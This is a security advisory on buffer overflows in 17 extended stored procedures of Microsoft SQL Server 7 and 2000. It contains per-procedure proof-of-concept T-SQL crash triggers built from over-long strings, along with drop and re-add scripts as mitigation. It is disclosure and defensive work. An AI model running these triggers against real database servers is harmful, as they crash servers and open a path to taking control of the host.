|
Microsoft SQL Server: Buffer Overflows in numerous extended stored procedures Credit: These vulnerabilities were discovered by Cesar Cerrudo (sqlsec@yahoo.com) Risk level: High Summary: Numerous extended stored procedures in Microsoft SQL Server 7 and 2000 contain buffer overflows. These buffer overflows result in several scenarios:
1 - The database server crashing.
2 - The memory in the stack being overwritten, including the return address of the calling function resulting in an exception being thrown.
These buffer overflows are the result of passing unusually long strings of data as parameters to extended stored procedures. The majority of these buffer overflows are the result of passing large Unicode buffers. Although these buffer overflows are based on Unicode strings, exploiting them is not particularly difficult given such methods as the "Venetian" exploit which allows arbitrary shell code to be written using Unicode buffers. The following extended stored procedures are vulnerable: xp_controlqueueservice
xp_createprivatequeue
xp_createqueue
xp_decodequeuecmd
xp_deleteprivatequeue
xp_deletequeue
xp_displayqueuemesgs
xp_dsninfo
xp_mergelineages
xp_oledbinfo
xp_proxiedmetadata
xp_readpkfromqueue
xp_readpkfromvarbin
xp_repl_encrypt
xp_resetqueue
xp_sqlinventory
xp_unpackcab
Details: Microsoft SQL Server provides the ability to call functions in DLLs outside of the database. These functions, called extended stored procedures, greatly expand the functionality of Microsoft SQL Server. They can be used to access the operating system or the network. Several hundred are shipped with Microsoft SQL Server and custom developed extended stored procedures can be added to the database by the administrator. Based on the findings of Cesar Cerrudo (sqlsec@yahoo.com), the extended stored procedures listed above contain buffer overflows that allow arbitrary shell code to be inserted onto the stack. By default, a few of these extended stored procedures are granted to the public group. Those that are granted to the public group allow a non-privileged user to gain full control of the operating system and the database. For those extended stored procedures that are not granted to public by default, several concerns still exist: 1) The DBA for one instance can gain full control of the operating system and other instances and programs on the server. 2) If a DBA has granted permissions to execute one of these extended stored procedures to a non-privileged user, that user can gain full control of the system. The problem is caused by assumptions in the extended stored procedures about the data types and sizes being passed in. Extended stored procedures do no accept parameters directly as other functions do. Instead, an extended stored procedure retrieves the parameters that are passed to it using a set of API functions, the most important of which is svr_paraminfo. Below is the definition of this function: int srv_paraminfo (
SRV_PROC * srvproc,
int n,
BYTE * pbType,
ULONG * pcbMaxLen,
ULONG * pcbActualLen,
BYTE * pbData,
BOOL * pfNull ); A stored procedure checks to determine the data type and length of each parameter passed to it. A varchar is limited to 8000 characters and an nvarchar is limited to 4000 characters. If however an ntext data type which has a maximum length of 2^30 - 1 (1,073,741,823) characters is passed to a parameter which expects a nvarchar and the extended stored procedure attempts to copy this parameter into a buffer created for a much smaller nvarchar, the stack can be overwritten. Below are the results of the Team SHATTER research for each individual buffer overflow. All tests were performed using a default installation with the latest Microsoft SQL Server service packs applied as show here. Microsoft SQL Server 2000 - 8.00.578 (Intel X86) Feb 12 2002 20:54:17 Microsoft SQL Server 7.00 - 7.00.1021 (Intel X86) Feb 18 2002 15:16:10 __________________________________________ xp_controlqueueservice Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for both Unicode and non-unicode buffers Code examples:
-- buffer overflow starts overwriting the error message coming back from MSSQL
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',121))
execute xp_controlqueueservice @test, '' Server: Msg 50007, Level 16, State 1, Line 0
np_controlqueueservice: Message Queuing does not exist as an installed service -- here it is overwriting another 79 characters
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',200))
execute xp_controlqueueservice @test, '' Server: Msg 50007, Level 16, State 1, Line 0 nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnxp_controlqueueservice has two input parameters : @control_command, @return_result OUTPUT -- crashes the server starting at 767 characters
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',767))
execute xp_controlqueueservice @test, ''
__________________________________________ xp_createprivatequeue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Buffer overflow occurred for both Unicode and non-unicode vulnerabilities Code examples:
-- generates an exception at 257 Unicode characters, but doesn't crash the server
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',257))
execute xp_createprivatequeue @test -- crashes the server at 492 Unicode characters or more
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',492))
execute xp_createprivatequeue @test -- generates an exception at 513 non-Unicode characters, but doesn't crash the server
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',513))
execute xp_createprivatequeue @test -- crashes the server at 983 non-Unicode characters or more
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',983))
execute xp_createprivatequeue @test __________________________________________ xp_createqueue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Buffer overflow occurred for both Unicode and non-Unicode vulnerabilities Code examples:
-- buffer overflow at 1286 non-unicode buffer
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',1286))
execute xp_createqueue @test,'','','','','' -- starting at 1743 non-Unicode characters crashes the server
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',1743))
execute xp_createqueue @test,'','','','','' -- unicode buffer crashes the database
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',1742))
execute xp_createqueue @test,'','','','','' __________________________________________ xp_decodequeuecmd Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for Unicode buffers only Code examples:
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_decodequeuecmd @test,'' __________________________________________ xp_deleteprivatequeue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for both Unicode and non-unicode buffers Code examples:
-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_deleteprivatequeue @test,'' -- Unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_deleteprivatequeue @test,'' __________________________________________ xp_deletequeue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for both Unicode and non-unicode buffers Code examples:
-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_deletequeue @test,'' -- unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_deletequeue @test,'' __________________________________________ xp_displayqueuemesgs Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for both Unicode and non-unicode buffers Code examples:
-- non-Unicode buffer causes the server to crash
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_displayqueuemesgs @test,'','','','' -- unicode buffer also causes the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_displayqueuemesgs @test,'','','','' __________________________________________ xp_dsninfo Versions vulnerable: SQL Server 7.0 (xpsql70.dll) Default permissions granted: dbo Buffer overflow occurred for both Unicode and non-unicode vulnerabilities Code examples:
-- buffer overflow at 38 characters or greater but no server crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',38))
execute xp_dsninfo @test -- buffer overflow with unicode buffer at 38 or greater but no server crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',38))
execute xp_dsninfo @test -- buffer overflow at 78 bytes or more caused the server to crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_dsninfo @test -- buffer overflow at unicode buffer of 511 characters or more caused the server to crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',511))
execute xp_dsninfo @test __________________________________________ xp_mergelineages Versions vulnerable: SQL Server 2000 (xprepl.dll) Default permissions granted: public Overflow occurred for Unicode buffers Code examples:
-- buffer overflow with a Unicode-buffer of more than 4000 characters is passed into the first parameter
xp_mergelineages N'AAAAAAAAAA[4000+]', '', ''
__________________________________________ xp_oledbinfo Versions vulnerable: SQL Server 2000 and SQL Server 7 (xprepl.dll) Default permissions granted: dbo Overflow occurred for non-Unicode buffers Code examples:
-- For SQL Server 7.0
-- anything 4000 or greater non-unicode causes overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_oledbinfo @test,'','','','','','','' --For SQL Server 2000
-- buffer overflow but the server does not crash
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',8000))
execute xp_oledbinfo @test,'','','','','','',''
__________________________________________ xp_proxiedmetadata Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll) Default permissions granted: public Overflow occurred for Unicode buffers Code examples:
-- overflow on both SQL Server 7 and 2000 when a Unicode-buffer greater than 4000 characters is passed as the first parameter
xp_proxiedmetadata N'AAAAAAAAAA[4000+]', '', '', ''
__________________________________________ xp_readpkfromqueue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for non-Unicode and Unicode buffers Code examples:
-- non-Unicode buffer overflow in 1st parameter
xp_readpkfromqueue 'AAAAAAAAAA[10,000+]','','' -- Unicode buffer overflow in 1st parameter
xp_readpkfromqueue N'AAAAAAAAAA[5,000+]','','' -- buffer overflow in 3rd parameter
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_readpkfromqueue N' ', N' ',@test __________________________________________ xp_readpkfromvarbin Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for non-Unicode and Unicode buffers Code examples:
-- non-Unicode buffer overflow in 1st parameter
xp_readpkfromvarbin 'AAAAAAAAAA[10,000+]',N'x',N'x',0,0x87 -- Unicode buffer overflow in 1st parameter
xp_readpkfromvarbin N'AAAAAAAAAA[5,000+]',N'x',N'x',0,0x87 -- buffer overflow in 3rd parameter
DECLARE @test nvarchar(4000)
DECLARE @test1 varbinary(4000)
select @test1 = cast((SELECT replicate(N'n',4000)) as varbinary) SET @test = (SELECT replicate(N'n',4000)) execute xp_readpkfromvarbin N' ', N' ', @test, 0, @test1 __________________________________________ xp_repl_encrypt Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll) Default permissions granted: dbo Overflow occurred for both Unicode and non-Unicode buffers Code examples:
-- For SQL Server 7.0
-- anything 4000 or greater non-unicode causes overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_repl_encrypt @test -- 4000 character unicode buffer causes buffer overflow
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_repl_encrypt @test --For SQL Server 2000
-- anything 4000 or greater non-unicode causes overflow
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('n',4000))
execute xp_repl_encrypt @test -- could not detect unicode buffer overflow in SQL Server 2000 __________________________________________ xp_resetqueue Versions vulnerable: SQL Server 2000 (xpqueue.dll) Default permissions granted: dbo Overflow occurred for Unicode buffers Code examples:
-- 4000 character Unicode buffer causes buffer overflow
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_resetqueue @test, '', '', '', '' -- 4000 character non-Unicode buffer causes buffer overflow
DECLARE @test varchar(4000)
SET @test = (SELECT replicate('n',4000))
execute xp_resetqueue @test, '', '', '', '' __________________________________________ xp_sqlinventory Versions vulnerable: SQL Server 7.0 (xpstar.dll) Default permissions granted: dbo Overflow occurred for Unicode buffers Code examples:
-- overflow when a Unicode-buffer greater than 4000 characters is passed as the first parameter
xp_sqlinventory N'AAAAAAAAAA[4000+]', '', '' __________________________________________ xp_unpackcab Versions vulnerable: SQL Server 2000 (xprepl.dll) Default permissions granted: dbo Overflow occurred for Unicode buffers Code examples:
-- buffer overflow but the server does not crash
DECLARE @test nvarchar(4000)
SET @test = (SELECT replicate(N'n',4000))
execute xp_unpackcab 'anything', @test, 'none'
Fix:
There is currently no patch or hotfix available from Microsoft although it is expected that one will be available in the next few days. Until a patch is available, it is recommended that you remove these extended stored procedures from the database and remove the underlying DLLs from the system. To remove these extended stored procedures from Microsoft SQL Server 2000, run the following script: use master
go
drop procedure xp_decodequeuecmd
go
drop procedure xp_controlqueueservice
go
drop procedure xp_createprivatequeue
go
drop procedure xp_createqueue
go
drop procedure xp_deleteprivatequeue
go
drop procedure xp_deletequeue
go
drop procedure xp_displayqueuemesgs
go
drop procedure xp_mergelineages
go
drop procedure xp_oledbinfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_readpkfromqueue
go
drop procedure xp_readpkfromvarbin
go
drop procedure xp_repl_encrypt
go
drop procedure xp_resetqueue
go
drop procedure xp_unpackcab
go
To remove these extended stored procedures from Microsoft SQL Server 7.0, run the following script: use master
go
drop procedure xp_repl_encrypt
go
drop procedure xp_oledbinfo
go
drop procedure xp_dsninfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_sqlinventory
go
After applying the hotfix, you can add the extended stored procedures for Microsoft SQL Server 2000 back by running the following commands. use master
go
exec sp_addextendedproc 'xp_decodequeuecmd', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_controlqueueservice', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_createprivatequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_createqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_deleteprivatequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_deletequeue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_displayqueuemesgs', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_mergelineages', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_oledbinfo', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_proxiedmetadata', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_readpkfromqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_readpkfromvarbin', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_repl_encrypt', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_resetqueue', 'xpqueue.dll'
go
exec sp_addextendedproc 'xp_unpackcab', 'xprepl.dll'
go
After applying the hotfix, you can add the extended stored procedures for Microsoft SQL Server 7 back by running the following commands.
use master
go
exec sp_addextendedproc 'xp_repl_encrypt', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_oledbinfo', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_dsninfo', 'xpsql70.dll'
go
exec sp_addextendedproc 'xp_proxiedmetadata', 'xprepl.dll'
go
exec sp_addextendedproc 'xp_sqlinventory', 'xpstar.dll'
go
|
